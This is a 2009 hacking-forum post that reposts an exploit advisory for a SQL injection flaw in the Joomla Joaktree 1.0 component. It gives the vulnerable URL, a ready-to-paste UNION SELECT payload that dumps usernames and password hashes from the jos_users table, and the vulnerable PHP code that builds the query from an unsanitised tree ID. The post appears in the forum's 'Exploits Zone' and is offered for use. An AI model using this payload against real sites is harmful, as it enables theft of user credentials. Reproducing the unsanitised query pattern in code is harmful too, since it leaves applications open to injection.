[x]
We are happy to see you on AH
AH - AndhraHackers is a place to entertain as well to spread knowledge around.
One of the most exciting Indian Community over Internet.

We would like you to Join AH Forum Today.

Why to JOIN AH forum ?
+  Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
|-+  °l||l° HacKing/Exploits Zone °l||l°» Exploits» Joomla Joaktree Component v1.0 SQL Injection Vulnerability
Username:
Password:
Home Help Search Terms of Service Login Register
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Joomla Joaktree Component v1.0 SQL Injection Vulnerability  (Read 306 times)
0 Members and 1 Guest are viewing this topic.
Fak!R
ICW Team Member
Full Member
*****

Karma: +6/-0
Offline Offline

Posts: 171



WWW
« on: December 03, 2009, 05:20:57 AM »
###############################
# EDB-ID: 10272
# CVE-ID: ()
# Title: Joomla Joaktree Component v1.0 SQL Injection Vulnerability
# Author: Don Tukulesto
# Published: 2009-12-01
###############################

/**************************************************************************

[!] Joomla! Joaktree component SQL injection vulnerability
[!] Author   : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage   : http://www.indonesiancoder.com
[!] Date   : November 30, 2009
[!] Tune In   : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]


===========================================================================

[ Here we go.. Proof of Concept ]
]
http://server/index.php?option=com_joaktree&view=joaktree&treeId=[INDONESIANCODER]

[ Exploit ]

Code:
-1+union+select+1,1,1,version(),1,666,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1+from+jos_users--
===========================================================================

+++++++++++++++++++++++++++++++ Analysis +++++++++++++++++++++++++++++++++++++++++
In com_joaktree/components/com_joaktree/models/joaktreestart.php

Code:
56 function _buildTreeQuery()
57 {
58 $query = 'SELECT  * '
59                    .'FROM    #__joaktree_trees '
60 .'WHERE   id = ' . $this->_tree_id;
61
62 return $query;
63 }

The _tree_id is the variable where we inject the sql code......
+++++++++++++++++++++++++++++++++ By F4k1R AndhraHackers.com+++++++++++++++++++++++++++++++++++++++
Logged
Fak!R is back!!
Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
« on: December 03, 2009, 05:20:57 AM »
 Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  


whitec0de.com | Techian.com | GfxLovers.com | milw0rm.com
Theme by Indian Servers. Powered by SMF 1.1.11 | SMF © 2006-2009, Simple Machines LLC MySQL | PHP | XHTML | CSS
Page created in 0.087 seconds with 29 queries.